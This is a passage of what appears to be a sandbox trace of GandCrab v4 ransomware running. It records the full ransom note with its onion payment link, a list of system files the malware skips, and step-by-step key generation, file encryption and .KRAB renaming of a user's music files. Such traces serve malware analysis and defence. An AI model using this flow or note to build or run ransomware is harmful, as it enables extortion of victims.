hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0093.395] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0093.395] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0093.395] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.395] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.395] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\\\KRAB-DECRYPT.txt") returned 72 [0093.395] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\cec_ty9-roaaa-lke\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0093.399] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0093.399] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338ed20, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338ed20*=0x1f6e, lpOverlapped=0x0) returned 1 [0093.400] CloseHandle (hObject=0x3a8) returned 1 [0093.400] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.401] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.401] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x28, wMilliseconds=0x25c)) [0093.401] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.401] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0093.401] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0093.402] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\d2ca4a08d2ca4dee3d.lock") returned 78 [0093.402] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\cec_ty9-roaaa-lke\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3a8 [0093.402] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.403] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.403] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\") returned 55 [0093.403] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\*" [0093.403] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\*", lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0xfbd560 [0093.403] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.403] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0093.403] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.403] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.403] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0093.404] lstrcmpW (lpString1="8v0TUg.wav", lpString2=".") returned 1 [0093.404] lstrcmpW (lpString1="8v0TUg.wav", lpString2="..") returned 1 [0093.404] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\", lpString2="8v0TUg.wav" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\8v0TUg.wav") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\8v0TUg.wav" [0093.404] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.404] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\8v0TUg.wav.KRAB") returned 70 [0093.404] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\8v0TUg.wav") returned 65 [0093.404] lstrlenW (lpString=".wav") returned 4 [0093.404] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.404] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".wav ") returned 5 [0093.405] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.405] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\8v0TUg.wav") returned 65 [0093.405] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\8v0TUg.wav") returned 65 [0093.405] lstrcmpiW (lpString1="8v0TUg.wav", lpString2="desktop.ini") returned -1 [0093.405] lstrcmpiW (lpString1="8v0TUg.wav", lpString2="autorun.inf") returned -1 [0093.405] lstrcmpiW (lpString1="8v0TUg.wav", lpString2="ntuser.dat") returned -1 [0093.406] lstrcmpiW (lpString1="8v0TUg.wav", lpString2="iconcache.db") returned -1 [0093.406] lstrcmpiW (lpString1="8v0TUg.wav", lpString2="bootsect.bak") returned -1 [0093.406] lstrcmpiW (lpString1="8v0TUg.wav", lpString2="boot.ini") returned -1 [0093.406] lstrcmpiW (lpString1="8v0TUg.wav", lpString2="ntuser.dat.log") returned -1 [0093.406] lstrcmpiW (lpString1="8v0TUg.wav", lpString2="thumbs.db") returned -1 [0093.406] lstrcmpiW (lpString1="8v0TUg.wav", lpString2="KRAB-DECRYPT.html") returned -1 [0093.406] lstrcmpiW (lpString1="8v0TUg.wav", lpString2="KRAB-DECRYPT.txt") returned -1 [0093.406] lstrcmpiW (lpString1="8v0TUg.wav", lpString2="CRAB-DECRYPT.txt") returned -1 [0093.406] lstrcmpiW (lpString1="8v0TUg.wav", lpString2="ntldr") returned -1 [0093.406] lstrcmpiW (lpString1="8v0TUg.wav", lpString2="NTDETECT.COM") returned -1 [0093.407] lstrcmpiW (lpString1="8v0TUg.wav", lpString2="Bootfont.bin") returned -1 [0093.407] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.408] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1011898) returned 1 [0093.409] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0093.411] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0093.411] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0093.412] CryptGenRandom (in: hProv=0x1011898, dwLen=0x20, pbBuffer=0x338eccc | out: pbBuffer=0x338eccc) returned 1 [0093.412] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0093.412] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.418] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1011678) returned 1 [0093.418] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0093.419] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0093.419] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0093.419] CryptGenRandom (in: hProv=0x1011678, dwLen=0x8, pbBuffer=0x338ecec | out: pbBuffer=0x338ecec) returned 1 [0093.419] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0093.419] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.420] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1011898) returned 1 [0093.420] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd620) returned 1 [0093.420] CryptGetKeyParam (in: hKey=0xfbd620, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0093.420] CryptEncrypt (in: hKey=0xfbd620, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0093.420] GetLastError () returned 0x0 [0093.421] CryptDestroyKey (hKey=0xfbd620) returned 1 [0093.421] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0093.421] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010df8) returned 1 [0093.421] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd7a0) returned 1 [0093.421] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0093.421] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0093.422] GetLastError () returned 0x0 [0093.422] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0093.422] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0093.422] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\8v0TUg.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\cec_ty9-roaaa-lke\\8v0tug.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x734 [0093.422] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0093.423] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0093.423] ReadFile (in: hFile=0x734, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ecfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ecfc*=0x14f72, lpOverlapped=0x0) returned 1 [0093.437] SetFilePointerEx (in: hFile=0x734, liDistanceToMove=0xfffeb08e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.437] WriteFile (in: hFile=0x734, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x14f72, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ecf8*=0x14f72, lpOverlapped=0x0) returned 1 [0093.438] WriteFile (in: hFile=0x734, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ecf8*=0x208, lpOverlapped=0x0) returned 1 [0093.438] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.442] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.443] CloseHandle (hObject=0x734) returned 1 [0093.443] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.443] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\8v0TUg.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\cec_ty9-roaaa-lke\\8v0tug.wav"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\8v0TUg.wav.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\cec_ty9-roaaa-lke\\8v0tug.wav.krab")) returned 1 [0093.444] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.447] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0093.447] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0093.447] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0093.447] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\d2ca4a08d2ca4dee3d.lock" [0093.447] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.447] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 83 [0093.447] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\d2ca4a08d2ca4dee3d.lock") returned 78 [0093.447] lstrlenW (lpString=".lock") returned 5 [0093.447] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.449] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0093.449] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.449] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.450] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0093.450] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0093.450] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0093.450] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\KRAB-DECRYPT.txt" [0093.450] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.450] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\KRAB-DECRYPT.txt.KRAB") returned 76 [0093.450] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\KRAB-DECRYPT.txt") returned 71 [0093.450] lstrlenW (lpString=".txt") returned 4 [0093.450] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.451] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0093.451] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.451] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\KRAB-DECRYPT.txt") returned 71 [0093.451] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\KRAB-DECRYPT.txt") returned 71 [0093.451] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0093.451] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0093.451] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0093.451] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0093.451] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0093.451] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0093.451] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0093.451] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0093.451] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0093.452] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0093.452] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.452] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0093.452] lstrcmpW (lpString1="KUqlS9GQ4u 1q.mp3", lpString2=".") returned 1 [0093.452] lstrcmpW (lpString1="KUqlS9GQ4u 1q.mp3", lpString2="..") returned 1 [0093.452] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\", lpString2="KUqlS9GQ4u 1q.mp3" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\KUqlS9GQ4u 1q.mp3") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\KUqlS9GQ4u 1q.mp3" [0093.452] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.452] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\KUqlS9GQ4u 1q.mp3.KRAB") returned 77 [0093.453] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\KUqlS9GQ4u 1q.mp3") returned 72 [0093.453] lstrlenW (lpString=".mp3") returned 4 [0093.453] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.453] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".mp3 ") returned 5 [0093.453] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.453] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\KUqlS9GQ4u 1q.mp3") returned 72 [0093.453] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\KUqlS9GQ4u 1q.mp3") returned 72 [0093.453] lstrcmpiW (lpString1="KUqlS9GQ4u 1q.mp3", lpString2="desktop.ini") returned 1 [0093.453] lstrcmpiW (lpString1="KUqlS9GQ4u 1q.mp3", 